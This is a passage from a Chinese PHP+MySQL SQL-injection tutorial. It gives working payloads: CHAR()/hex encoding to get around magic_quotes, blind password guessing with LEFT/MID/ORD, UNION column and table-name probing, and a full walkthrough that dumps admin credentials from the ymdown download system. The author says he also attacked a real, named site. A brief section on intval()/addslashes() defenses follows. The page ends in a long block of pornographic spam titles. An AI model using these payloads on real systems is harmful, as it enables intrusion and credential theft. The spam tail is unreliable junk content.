注:現(xiàn)在我們假設(shè)magic_quotes_gpc為on了。

  眾所周知,整形的數(shù)據(jù)是不需要用引號(hào)引起來的,而字符串就要用引號(hào),這樣可以避免很多問題。但是如果僅僅用整形數(shù)據(jù),我們是沒有辦法注入的,所以我需要把我們構(gòu)造的語句轉(zhuǎn)換成整形類型,這個(gè)就需要用到CHAR(),ASCII(),ORD(),CONV()這些函數(shù)了,舉個(gè)簡(jiǎn)單的例子:

SELECT * FROM user WHERE username='angel'

  如何使$username不帶引號(hào)呢?很簡(jiǎn)單我們這樣提交就可以了。

SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) 相當(dāng)于angel,十進(jìn)制。
SELECT * FROM user WHERE username=0x616E67656C
# 0x616E67656C 相當(dāng)于angel,十六進(jìn)制。

  其他函數(shù)大家自己去測(cè)試好了,但是前提就如上面所說的,我們可以構(gòu)造的變量不被引號(hào)所包含才有意義,不然我們不管構(gòu)造什么,只是字符串,發(fā)揮不了作用,比如前面猜密碼的例子(user,php),我們把查詢條件改為userid:

SELECT * FROM user WHERE userid=userid

  按照正常的,提交:

http://127.0.0.1/injection/user.php?userid=1

  就可以查詢userid為1的用戶資料,因?yàn)?是數(shù)字,所以有沒有引號(hào)都無所謂,但是如果我們構(gòu)造:

http://127.0.0.1/injection/user.php?userid=1 and password=mypass

  絕對(duì)錯(cuò)誤,因?yàn)閙ypass是字符串,除非提交:

http://127.0.0.1/injection/user.php?userid=1 and password='mypass'

  由于magic_quotes_gpc打開的關(guān)系,這個(gè)是絕對(duì)不可能的。引號(hào)會(huì)變成/',我們有什么辦法可以把這些字符串變成整形數(shù)據(jù)嗎?就是用CHAR()函數(shù),如果我們提交:

http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)

  正常返回,實(shí)踐證明,我們用CHAR()是可行的,我們就把CHAR()用進(jìn)LEFT函數(shù)里面逐位猜解!

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)=char(109)

  正常返回,說明userid為1的用戶,password字段第一位是char(109),我們繼續(xù)猜:

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,2)=char(109,121)

  又正常返回,說明正確,但這樣影響到效率,既然是整形,我們完全可以用比較運(yùn)算符來比較:

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)

  然后適當(dāng)調(diào)整char()里面的數(shù)字來確定一個(gè)范圍,很快就可以猜出來,到了后面的時(shí)候,還是可以用比較運(yùn)算符來比較:

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,3)>char(109,121,111)

  而原來已經(jīng)猜好的不用改變了,很快就可以猜完:

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,6)=char(109,121,112,97,115,115)

  然后在mysql>命令提示符下或者在phpMyadmin里面執(zhí)行:

select char(109,121,112,97,115,115)

  就會(huì)返回:mypass

  當(dāng)然也可以使用SUBSTRING(str,pos,len)和MID(str,pos,len)函數(shù),從字符串 str 的 pos 位置起返回 len 個(gè)字符的子串。這個(gè)和ACCESS是一樣的。還是剛才的例子,我們猜password字段的第三位、第四位試試,第三位是p,第四位是a,我們這樣構(gòu)造:

http://127.0.0.1/injection/user.php?userid=1 and mid(password,3,1)=char(112)
http://127.0.0.1/injection/user.php?userid=1 and mid(password,4,1)=char(97)

  我們要的結(jié)果就迸出來了。當(dāng)然,如果覺得麻煩,還可以用更簡(jiǎn)單的辦法,就是利用ord()函數(shù),具體作用可以去查看MYSQL參考手冊(cè),該函數(shù)返回的是整形類型的數(shù)據(jù),可以用比較運(yùn)算符進(jìn)行比較、當(dāng)然得出的結(jié)果也就快多了,也就是這樣提交:

http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))<113
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))=112

  這樣我們就得出結(jié)果了,然后我們?cè)儆胏har()函數(shù)還原出來就好了。至于其他更多函數(shù),大家可以自己去試驗(yàn),限于篇幅也不多說了。

3、快速確定未知數(shù)據(jù)結(jié)構(gòu)的字段及類型

  如果不清楚數(shù)據(jù)結(jié)構(gòu),很難用UNION聯(lián)合查詢,這里我告訴大家一個(gè)小技巧,也是非常有用非常必要的技巧,充分發(fā)揮UNION的特性。
  還是拿前面的show.php文件做例子,當(dāng)我們看到形如xxx.php?id=xxx的URL的時(shí)候,如果要UNION,就要知道這個(gè)xxx.php查詢的數(shù)據(jù)表的結(jié)構(gòu),我們可以這樣提交來快速確定有多少個(gè)字段:

http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1

  有多少個(gè)“1”就表示有多少個(gè)字段,可以慢慢試,如果字段數(shù)不相同,就肯定會(huì)出錯(cuò),如果字段數(shù)猜對(duì)了,就肯定會(huì)返回正確的頁面,字段數(shù)出來了,就開始判斷數(shù)據(jù)類型,其實(shí)也很容易,隨便用幾個(gè)字母代替上面的1,但是由于magic_quotes_gpc打開,我們不能用引號(hào),老辦法,還是用char()函數(shù),char(97)表示字母“a”,如下:

http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

  如果是字符串,那就會(huì)正常顯示“a”,如果不是字符串或文本,也就是說是整形或布爾形,就會(huì)返回“0”,如圖:

  判斷最主要靠什么?經(jīng)驗(yàn),我以前一直都說,經(jīng)驗(yàn)很重要,豐富經(jīng)驗(yàn)?zāi)芨玫淖鞒稣_的判斷,因?yàn)槌绦虻拇a是千變?nèi)f化的,我們這里是只是舉個(gè)最簡(jiǎn)單的例子,這里由于局限性,程序都是我自己寫、自己測(cè)試的。方法因程序而異。希望大家在實(shí)戰(zhàn)中,注意區(qū)別,不要照搬,靈活運(yùn)用才是根本。

4、猜數(shù)據(jù)表名

  在快速確定未知數(shù)據(jù)結(jié)構(gòu)的字段及類型的基礎(chǔ)上,我們又可以進(jìn)一步的分析整個(gè)數(shù)據(jù)結(jié)構(gòu),那就是猜表名,其實(shí)使用UNION聯(lián)合查詢的時(shí)候,不管后面的查詢?cè)趺础盎巍?,只要沒有語句上的問題,都會(huì)正確返回,也就是說,我們可以在上面的基礎(chǔ)上,進(jìn)一步猜到表名了,比如剛才我們提交:

http://127.0.0.1/injection/show.php?id=1 union select 1,1,1

  返回正常的內(nèi)容,就說明這個(gè)文件查詢的表內(nèi)是存在3個(gè)字段的,然后我們?cè)诤竺婕尤雈rom table_name,也就是這樣:

http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from members
http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from admin
http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from user

  如果這個(gè)表是存在的,那么同樣會(huì)返回應(yīng)該顯示的內(nèi)容,如果表不存在,當(dāng)然就會(huì)出錯(cuò)了,所以我的思路是先獲得有漏洞的文件所查詢表的數(shù)據(jù)結(jié)構(gòu),確定結(jié)果后再進(jìn)一步查詢表,這個(gè)手工操作是沒有效率的問題的,不到一分鐘就可以查詢到了,比如我們?cè)跍y(cè)試www.***bai.net就是這樣,后面的實(shí)例會(huì)涉及到。
  但是有一個(gè)問題,由于很多情況下,很多程序的數(shù)據(jù)表都會(huì)有一個(gè)前綴,有這個(gè)前綴就可以讓多個(gè)程序共用一個(gè)數(shù)據(jù)庫(kù)。比如:

site_article
site_user
site_download
forum_user
forum_post
……

  如果安全意識(shí)高的話,管理員會(huì)加個(gè)表名前綴,那猜解就很麻煩了,不過完全可以做一個(gè)表名列表來跑。這里就不多說了,后面會(huì)有一個(gè)具體的例子來解開一切迷茫^_^……

實(shí)例

  下面對(duì)一個(gè)國(guó)內(nèi)非常出名的站點(diǎn)進(jìn)行善意的攻擊測(cè)試,來對(duì)上面的知識(shí)進(jìn)行一次大概的驗(yàn)證,出于影響等諸多因素,我們稱這個(gè)站點(diǎn)為HB(www.***bai.net),HB使用的是夜貓的文章系統(tǒng)和下載系統(tǒng),不過文章系統(tǒng)已經(jīng)升級(jí)了,我們就不看了,下載系統(tǒng)是絕對(duì)有問題的,不過由于我現(xiàn)在寫文章的電腦不上網(wǎng),我用相同的下載系統(tǒng)在本地進(jìn)行一次模擬的測(cè)試。實(shí)際上,我事前早用更狠毒的技術(shù)滲透過HB。
  首先我們找到有問題的文件,show.php?id=1,我們馬上看看數(shù)據(jù)結(jié)構(gòu)和表名,看看HB有沒有改字段和表名,我早知道夜貓下載系統(tǒng)1.0.1版的軟件信息的表有19個(gè)字段,就提交:

http://127.0.0.1/ymdown/show.php?id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

  注意,這里有19個(gè)“1”,返回正常的頁面,我可以可以肯定字段沒有變,我們也就別拖拉了,直接看看夜貓的默認(rèn)用戶數(shù)據(jù)表是否存在:

http://127.0.0.1/ymdown/show.php?id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user

  正常返回,如圖,如果URL不清楚可以看標(biāo)題那里:

  嗯,這個(gè)HB還真是夠懶的,這么爛的程序也不知道先修改一下再用,不過也是,沒有多少人和我一樣有閑心先去加固程序才用的,再看默認(rèn)的用戶id還在不在?

http://127.0.0.1/ymdown/show.php?id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

  忘記了,就算不存在id為1的用戶,前面的查詢是真的,照樣會(huì)正常返回?cái)?shù)據(jù)庫(kù)的軟件信息,我們只能讓前面的查詢?yōu)榧?,才能使后面查詢的結(jié)果顯示出來,但我們要注意一點(diǎn),show.php文件里面有這樣一段代碼:

if ($id > "0" && $id < "999999999" ):
//這里是正確執(zhí)行的代碼
else:
echo "<p><center><a href=./list.php>無記錄</a></p>\n";

  也就是說我們的ID的值再怎么離譜也不能在0和999999999之外,HB的軟件肯定不會(huì)超過10000個(gè)的,我們就提交:

http://127.0.0.1/ymdown/show.php?id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

  正常返回了,表格里的數(shù)據(jù)全部是“1”,說明ID還在哦。如果不存在的話,頁面只返回的數(shù)據(jù)全部是不詳,因?yàn)槌绦虻呐袛嗍侨绻麛?shù)據(jù)為空就顯示不詳?,F(xiàn)在確定了ID存在后,還要確定是不是管理員才行啊:

http://127.0.0.1/ymdown/show.php?id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1

  程序規(guī)定groupid為1是超級(jí)管理員,既然都返回正確信息了,我們就直接構(gòu)造畸形語句,暴出我們需要的用戶名和密碼,嘿嘿,首先看看ymdown表的數(shù)據(jù)結(jié)構(gòu),因?yàn)閟how.php是查詢它的,所以我們應(yīng)該看它的數(shù)據(jù)結(jié)構(gòu)。

CREATE TABLE ymdown (
 id int(10) unsigned NOT NULL auto_increment,
 name varchar(100) NOT NULL,
 updatetime varchar(20) NOT NULL,
 size varchar(100) NOT NULL,
 empower varchar(100) NOT NULL,
 os varchar(100) NOT NULL,
 grade smallint(6) DEFAULT '0' NOT NULL,
 viewnum int(10) DEFAULT '0' NOT NULL,
 downnum int(10) DEFAULT '0' NOT NULL,
 homepage varchar(100), demo varchar(100),
 brief mediumtext, img varchar(100),
 sort2id smallint(6) DEFAULT '0' NOT NULL,
 down1 varchar(100) NOT NULL,
 down2 varchar(100),
 down3 varchar(100),
 down4 varchar(100),
 down5 varchar(100),
 PRIMARY KEY (id)
);

  用戶名和密碼的數(shù)據(jù)類型都是varchar,所以我們要選擇ymdown表里數(shù)據(jù)類型是varchar來,如果把varchar的數(shù)據(jù)寫到int的地方當(dāng)然是不可能顯示的了,由于updatetime(更新日期)的長(zhǎng)度是20,可能會(huì)出現(xiàn)顯示不完全的情況,我們就把用戶名顯示在name(軟件標(biāo)題)那里,密碼顯示在size(文件大小)那里好了,在19個(gè)“1”中,name和size分別是第二個(gè)和第四個(gè),我們提交:

http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

  結(jié)果成功返回了我們所需要的用戶名和密碼,如圖:

驗(yàn)證測(cè)試結(jié)果

  整個(gè)滲透過程就結(jié)束了,不過由于黑白把入口給改了,無法登陸,但我們僅僅測(cè)試注入,目的已經(jīng)達(dá)到了,就沒有必要進(jìn)后臺(tái)了,我后來又繼續(xù)構(gòu)造SQL語句來驗(yàn)證我們獲取的密碼是否正確,依次提交:

http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49
#驗(yàn)證第一位密碼
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50
#驗(yàn)證第二位密碼
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
#驗(yàn)證第三位密碼
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,4,1))=52
#驗(yàn)證第四位密碼
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,5,1))=53
#驗(yàn)證第五位密碼
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,6,1))=54
#驗(yàn)證第六位密碼

  用select char(49,50,51,52,53,54)就可以得到123456。
  OK!測(cè)試結(jié)束,驗(yàn)證我們的結(jié)果沒有錯(cuò)誤。說明一下,密碼本身是123456,可以不用ord()函數(shù)而直接猜,但為了大家能看到一個(gè)完整的過程,我還是“專業(yè)”一點(diǎn)好了。下面補(bǔ)一幅截圖,是本文寫完后,重新測(cè)試HB時(shí)截取的:

注入的防范

  防范可以從兩個(gè)方面著手,一個(gè)就是服務(wù)器,二個(gè)就是代碼本身,介紹服務(wù)器配置的文章很多了,無非就是把magic_quotes_gpc設(shè)置為On,display_errors設(shè)置為Off,這里也就不在多說,既然本文接觸都是程序的問題,我們還是從程序本身尋找原因。
  如果說php比asp易用,安全,從內(nèi)置的函數(shù)就可以體現(xiàn)出來。如果是整形的變量,只需使用一個(gè)intval()函數(shù)即可解決問題,在執(zhí)行查詢之前,我們先處理一下變量,如下面的例子就是很安全的了:

$id = intval($id);
mysql_query("SELECT * FROM article WHERE articleid='$id'");

  或者這樣寫:

mysql_query("SELECT * FROM article WHERE articleid=".intval($id)."")

  不管如何構(gòu)造,最終還是會(huì)先轉(zhuǎn)換為整形猜放入數(shù)據(jù)庫(kù)的。很多大型程序都是這樣寫,非常簡(jiǎn)潔。
  字符串形的變量也可以用addslashes()整個(gè)內(nèi)置函數(shù)了,這個(gè)函數(shù)的作用和magic_quotes_gpc一樣,使用后,所有的 ' (單引號(hào)), " (雙引號(hào)), \ (反斜線) and 空字符會(huì)自動(dòng)轉(zhuǎn)為含有反斜線的溢出字符。而且新版本的php,就算magic_quotes_gpc打開了,再使用addslashes()函數(shù),也不會(huì)有沖突,可以放心使用。例子如下:

$username = addslashes($username);
mysql_query("SELECT * FROM members WHERE userid='$username'");

  或者這樣寫:

mysql_query("SELECT * FROM members WHERE userid=".addslashes($username)."")

  使用addslashes()函數(shù)還可以避免引號(hào)配對(duì)錯(cuò)誤的情況出現(xiàn)。而剛才的前面搜索引擎的修補(bǔ)方法就是直接把“_”、“%”轉(zhuǎn)換為“\_”“\%”就可以了,當(dāng)然也不要忘記使用addslashes()函數(shù)。具體代碼如下:

$keywords = addslashes($keywords);
$keywords = str_replace("_","\_",$keywords);
$keywords = str_replace("%","\%",$keywords);

  不用像ASP那樣,過濾一點(diǎn)變量,就要寫一大堆的代碼,就是上面的一點(diǎn)點(diǎn)代碼,我們就可以把本文所有的問題解決了,是不是很簡(jiǎn)便?

后記

  這篇文章是我自2004年3月份以來利用課余時(shí)間學(xué)習(xí)研究的,5月中旬寫完,里面的所有東西都是經(jīng)過我親自測(cè)試的,本文僅僅算是技術(shù)總結(jié)吧,還有很多技術(shù)難點(diǎn)沒有解決的,因此錯(cuò)漏是難免的,歡迎請(qǐng)大家指正。
  還有不少危險(xiǎn)性極高的東西,只要少數(shù)條件成立,一般都可以進(jìn)入服務(wù)器,考慮到嚴(yán)重性和廣泛性,我并沒有寫出來,我個(gè)人估計(jì),不久將會(huì)出現(xiàn)PHP+MYSQL注入的一系列工具,技術(shù)也會(huì)普及和告訴發(fā)展。但我建議大家一定要弄清楚原理,工具只是武器,技術(shù)才是靈魂,工具只是提高效率罷了,并不代表你的技術(shù)高超。
  大家看到這篇文章的時(shí)候,估計(jì)我已經(jīng)高考完了,暑假我會(huì)寫一篇更深入的研究。
  為了讓更多人了解并掌握PHP+MYSQL的注入技術(shù),我才寫了這篇文章,并決定發(fā)表,再重申一次。不要對(duì)任何國(guó)家的任何合法主機(jī)進(jìn)行破壞,否則后果自負(fù)。

相關(guān)文章

最新評(píng)論

狠狠地躁夜夜躁日日躁| av亚洲中文天堂字幕网| 一区二区三区精品日本| 啪啪啪啪啪啪啪免费视频| 大鸡巴插入美女黑黑的阴毛| 中文字幕一区二区三区蜜月| 青青社区2国产视频| 一区二区三区综合视频| 91人妻精品久久久久久久网站 | 91精品国产91青青碰| 亚洲嫩模一区二区三区| 免费看国产av网站| 青青草在观免费国产精品| heyzo蜜桃熟女人妻| 国产一区自拍黄视频免费观看| aⅴ精产国品一二三产品| 中文字幕奴隷色的舞台50| 久草极品美女视频在线观看| 高潮视频在线快速观看国家快速| 成熟熟女国产精品一区| 91香蕉成人app下载| 国产亚洲精品视频合集| 农村胖女人操逼视频| 久久久久久久精品成人热| 偷拍自拍国产在线视频| 自拍偷拍日韩欧美一区二区| 91麻豆精品久久久久| 日本女大学生的黄色小视频| 国产亚洲欧美45p| 99久久成人日韩欧美精品| 老司机福利精品免费视频一区二区| 99久久99久国产黄毛片| 白白操白白色在线免费视频| 91免费观看在线网站| 动色av一区二区三区| 欧美成人小视频在线免费看| 欧美亚洲中文字幕一区二区三区| 久久一区二区三区人妻欧美| av天堂中文免费在线| 日韩写真福利视频在线观看| 国产97视频在线精品| 国产av国片精品一区二区| 亚洲欧美综合在线探花| 欧美一区二区三区久久久aaa| 色在线观看视频免费的| 九色精品视频在线播放| 青青色国产视频在线| 亚洲成人激情视频免费观看了 | 午夜国产福利在线观看| 国产在线观看免费人成短视频| 国产高清女主播在线| 66久久久久久久久久久| 91九色国产porny蝌蚪| 天天干天天插天天谢| 国产精品视频一区在线播放| av网址在线播放大全| 五月激情婷婷久久综合网| 香蕉av影视在线观看| 熟女俱乐部一二三区| 天天做天天干天天舔| 美女 午夜 在线视频| 中文字幕免费在线免费| 亚洲国产欧美一区二区三区久久| 亚洲少妇高潮免费观看| 成人区人妻精品一区二视频| 超碰97免费人妻麻豆| 高清成人av一区三区| 国产九色91在线视频| 91自产国产精品视频| 又色又爽又黄的美女裸体| 中文字幕奴隷色的舞台50| av天堂中文字幕最新| 欧美另类z0z变态| v888av在线观看视频| 久久久麻豆精亚洲av麻花| 天天干夜夜操啊啊啊| 三级等保密码要求条款| 视频在线亚洲一区二区| 精品国产亚洲av一淫| 激情人妻校园春色亚洲欧美| 绝色少妇高潮3在线观看| 伊人综合免费在线视频| 国产高清精品极品美女| 老师啊太大了啊啊啊尻视频| 亚洲精品乱码久久久本| 亚洲熟妇久久无码精品| 大鸡吧插逼逼视频免费看| 蜜臀av久久久久久久| 啪啪啪18禁一区二区三区| 日韩激情文学在线视频| 日本女人一级免费片| 同居了嫂子在线播高清中文| 99久久久无码国产精品性出奶水 | 五十路人妻熟女av一区二区| 91亚洲手机在线视频播放| 午夜美女福利小视频| 国产白嫩美女一区二区| 老鸭窝在线观看一区| 日韩av熟妇在线观看| 日本熟妇喷水xxx| av中文字幕在线观看第三页| 成人国产影院在线观看| 国产精品视频资源在线播放| 好男人视频在线免费观看网站| 午夜精品一区二区三区城中村| 99热色原网这里只有精品| 3D动漫精品啪啪一区二区下载| 77久久久久国产精产品| 丝袜国产专区在线观看| 9久在线视频只有精品| 亚洲人人妻一区二区三区| 亚洲中文字幕人妻一区| 又色又爽又黄又刺激av网站| 2020韩国午夜女主播在线| 粗大的内捧猛烈进出爽大牛汉子| 欧美成人黄片一区二区三区 | 亚洲精品亚洲人成在线导航| mm131美女午夜爽爽爽| 91精品国产麻豆国产| 天天射夜夜操综合网| 顶级尤物粉嫩小尤物网站| 男大肉棒猛烈插女免费视频| 91精品啪在线免费| 精品一区二区三区在线观看| 男大肉棒猛烈插女免费视频 | 激情国产小视频在线| 黄片色呦呦视频免费看| 久久久久久国产精品| 亚洲成人熟妇一区二区三区 | 日日日日日日日日夜夜夜夜夜夜| 97年大学生大白天操逼 | av日韩在线免费播放| 男大肉棒猛烈插女免费视频| 亚洲 清纯 国产com| 美味人妻2在线播放| 特大黑人巨大xxxx| 少妇露脸深喉口爆吞精| 成人综合亚洲欧美一区| 日本少妇精品免费视频| 99精品视频之69精品视频| 一区二区三区日韩久久| 中国视频一区二区三区| 在线观看的黄色免费网站| 欧美一区二区三区四区性视频| 午夜91一区二区三区| 国产美女精品福利在线| 熟女人妻在线中出观看完整版| 亚洲成人线上免费视频观看| 国产成人精品福利短视频| 男女啪啪啪啪啪的网站| 亚洲成人精品女人久久久| 欧美在线精品一区二区三区视频 | 伊人成人综合开心网| 传媒在线播放国产精品一区| 高潮视频在线快速观看国家快速| 亚洲欧美久久久久久久久| 亚洲伊人久久精品影院一美女洗澡| 亚洲天堂有码中文字幕视频| 9色精品视频在线观看| 成人免费公开视频无毒| 精品一区二区三区三区88 | 大骚逼91抽插出水视频| 亚洲一区二区三区uij| 中文字幕一区的人妻欧美日韩| 日韩熟女系列一区二区三区| 91精品国产综合久久久蜜 | 国产极品精品免费视频| 日本熟妇喷水xxx| 一区二区三区综合视频| 五月天色婷婷在线观看视频免费| 免费无毒热热热热热热久| 在线观看免费岛国av| 在线亚洲天堂色播av电影| 久久久人妻一区二区| 99视频精品全部15| 亚洲欧美成人综合在线观看| 欧美偷拍亚洲一区二区| 成年人免费看在线视频| 国产精品系列在线观看一区二区| 自拍偷拍 国产资源| 成人av中文字幕一区| 91精品国产91青青碰| 成熟丰满熟妇高潮xx×xx| 青青社区2国产视频| 少妇被强干到高潮视频在线观看 | 蜜桃精品久久久一区二区| 久久这里只有精品热视频 | 免费黄高清无码国产| 一区二区三区国产精选在线播放 | 亚洲天堂精品久久久| 搡老熟女一区二区在线观看 | 中国黄片视频一区91| 动漫黑丝美女的鸡巴| 黄色的网站在线免费看| 男女啪啪啪啪啪的网站| 不卡日韩av在线观看| 国产亚洲精品视频合集| 少妇露脸深喉口爆吞精| 一区二区三区欧美日韩高清播放| 97黄网站在线观看| 首之国产AV医生和护士小芳| 在线免费视频 自拍| 91精品高清一区二区三区| 绯色av蜜臀vs少妇| 午夜激情精品福利视频| 国产美女一区在线观看| 亚洲精品av在线观看| 免费啪啪啪在线观看视频| 成人sm视频在线观看| 久草视频在线免播放| 福利一二三在线视频观看| 极品丝袜一区二区三区| 91欧美在线免费观看| japanese五十路熟女熟妇| 日本熟妇丰满厨房55| 久久香蕉国产免费天天| 亚洲精品欧美日韩在线播放| 女人精品内射国产99| 成人综合亚洲欧美一区| 国产在线自在拍91国语自产精品| 2021国产一区二区| 人妻另类专区欧美制服| 绝色少妇高潮3在线观看| 色综合久久五月色婷婷综合| 动漫美女的小穴视频| 亚洲综合另类欧美久久| 亚洲精品成人网久久久久久小说| 91国内视频在线观看| 黑人3p华裔熟女普通话| 欧美日韩中文字幕欧美| 91久久精品色伊人6882| 国产综合精品久久久久蜜臀| 免费在线观看视频啪啪| 91国产资源在线视频| 操人妻嗷嗷叫视频一区二区| 中国黄片视频一区91| 在线 中文字幕 一区| 日韩美女综合中文字幕pp| 青青青青视频在线播放| 亚洲一级特黄特黄黄色录像片| 天天干天天操天天爽天天摸| www,久久久,com| 在线制服丝袜中文字幕| 美女操逼免费短视频下载链接 | 男人的天堂在线黄色| 国产精品欧美日韩区二区 | 插逼视频双插洞国产操逼插洞| 韩国男女黄色在线观看| 欧美综合婷婷欧美综合| 亚洲欧美一卡二卡三卡| 91国内精品自线在拍白富美| 岛国黄色大片在线观看| 老司机免费视频网站在线看| 国产精选一区在线播放| 99国内小视频在现欢看| 99精品国自产在线人| 中文字幕人妻三级在线观看| 在线观看911精品国产| 老司机免费视频网站在线看| 免费看高清av的网站| 久青青草视频手机在线免费观看| 天天摸天天干天天操科普| 人人超碰国字幕观看97| 性色蜜臀av一区二区三区| av新中文天堂在线网址| 国产成人一区二区三区电影网站| 国产福利小视频免费观看| 福利片区一区二体验区| 第一福利视频在线观看| 蜜桃久久久久久久人妻| 日本18禁久久久久久| 爆乳骚货内射骚货内射在线| tube69日本少妇| av完全免费在线观看av| 国产91精品拍在线观看| 97成人免费在线观看网站| 久久精品在线观看一区二区| 狠狠的往里顶撞h百合| 婷婷综合亚洲爱久久| 亚洲2021av天堂| 青青草原色片网站在线观看| 91精品国产91青青碰| 天天日天天摸天天爱| 亚洲1区2区3区精华液| 天天做天天干天天操天天射| 亚洲精品 欧美日韩| 一区二区三区日本伦理| 经典av尤物一区二区| 阴茎插到阴道里面的视频| 国产老熟女伦老熟妇ⅹ| 黑人借宿ntr人妻的沦陷2| 中文字幕之无码色多多| 啪啪啪啪啪啪啪免费视频| 新97超碰在线观看| 91成人在线观看免费视频| 亚洲成人av一区在线| 1000部国产精品成人观看视频| 亚洲福利午夜久久久精品电影网| 精品91自产拍在线观看一区| 亚洲 欧美 自拍 偷拍 在线| 青青青青草手机在线视频免费看| 美女福利视频网址导航| 青青草在观免费国产精品| 欲满人妻中文字幕在线| 久久丁香婷婷六月天| 不卡一区一区三区在线| 青青草原色片网站在线观看| 亚洲av日韩精品久久久| 国产av国片精品一区二区| 国产熟妇乱妇熟色T区| 久久午夜夜伦痒痒想咳嗽P| 午夜美女福利小视频| 日日夜夜精品一二三| 亚洲图片欧美校园春色| 97a片免费在线观看| 国产在线一区二区三区麻酥酥| 日本熟妇一区二区x x| 又大又湿又爽又紧A视频| 最新中文字幕免费视频| 最新91九色国产在线观看| 人人爽亚洲av人人爽av| 老熟妇xxxhd老熟女| 国产亚洲视频在线二区| 78色精品一区二区三区| 91色秘乱一区二区三区| 国产一区二区久久久裸臀| 清纯美女在线观看国产| 任你操任你干精品在线视频| 91国产资源在线视频| 嫩草aⅴ一区二区三区| 久久h视频在线观看| 40道精品招牌菜特色| 国产日本欧美亚洲精品视| 日本免费视频午夜福利视频| 亚洲最大黄了色网站| 在线免费观看国产精品黄色| 男大肉棒猛烈插女免费视频| 2019av在线视频| 五十路息与子猛烈交尾视频| 国产1区,2区,3区| 午夜福利资源综合激情午夜福利资 | 成人av久久精品一区二区| 一区二区三区视频,福利一区二区| 女人精品内射国产99| 特黄老太婆aa毛毛片| 中文字幕人妻熟女在线电影| 国产精品成人xxxx| 成人网18免费视频版国产| 国产成人精品亚洲男人的天堂| 欧美熟妇一区二区三区仙踪林| 中文字幕一区二 区二三区四区 | 日视频免费在线观看| 丝袜肉丝一区二区三区四区在线| 国产妇女自拍区在线观看| 在线观看一区二区三级| 一区二区视频视频视频| nagger可以指黑人吗| 亚洲一区二区三区在线高清| 亚洲一区二区三区偷拍女厕91| 婷婷综合亚洲爱久久| 人妻3p真实偷拍一二区| 五十路丰满人妻熟妇| 又色又爽又黄又刺激av网站| 国产精品久久久黄网站| 日本阿v视频在线免费观看| 78色精品一区二区三区| 亚洲 色图 偷拍 欧美| 国产成人精品福利短视频| 日本www中文字幕| 热思思国产99re| 天天日天天摸天天爱| 天天综合天天综合天天网| 都市激情校园春色狠狠| av亚洲中文天堂字幕网| 做爰视频毛片下载蜜桃视频1| 日本18禁久久久久久| 亚洲欧美另类自拍偷拍色图| 2021天天色天天干| 性欧美激情久久久久久久| 日韩少妇人妻精品无码专区| 人妻3p真实偷拍一二区| 中国熟女@视频91| 欧美爆乳肉感大码在线观看| 93人妻人人揉人人澡人人| 日本少妇精品免费视频| 91she九色精品国产| 在线免费91激情四射 | 色综合久久久久久久久中文| 国产真实乱子伦a视频| 亚洲精品午夜久久久久| 2022国产综合在线干| 小泽玛利亚视频在线观看| 香蕉aⅴ一区二区三区| 国产成人午夜精品福利| 国产久久久精品毛片| 久久精品36亚洲精品束缚| 国产高清精品极品美女| 精品国产在线手机在线| 午夜场射精嗯嗯啊啊视频| 欧美爆乳肉感大码在线观看| 国产又粗又猛又爽又黄的视频在线| 国产成人精品亚洲男人的天堂| 欧美日韩高清午夜蜜桃大香蕉 | AV无码一区二区三区不卡| 在线观看欧美黄片一区二区三区| 性色av一区二区三区久久久| 国产福利在线视频一区| 成人精品在线观看视频| 中文字幕av男人天堂| 日韩亚洲高清在线观看| 国产揄拍高清国内精品对白| 夜夜嗨av蜜臀av| 中文字幕一区二区三区蜜月| 一区二区视频在线观看免费观看| 欧美aa一级一区三区四区| 国产自拍黄片在线观看| 久久久久久cao我的性感人妻 | 亚洲国产中文字幕啊啊啊不行了| 偷拍3456eee| 天天干天天日天天谢综合156| 不卡日韩av在线观看| 久青青草视频手机在线免费观看 | 啊啊好大好爽啊啊操我啊啊视频 | 亚洲2021av天堂| 免费国产性生活视频| 午夜在线观看一区视频| 老师让我插进去69AV| 婷婷综合亚洲爱久久| 亚洲激情,偷拍视频| 天堂av在线最新版在线| 美女福利写真在线观看视频| 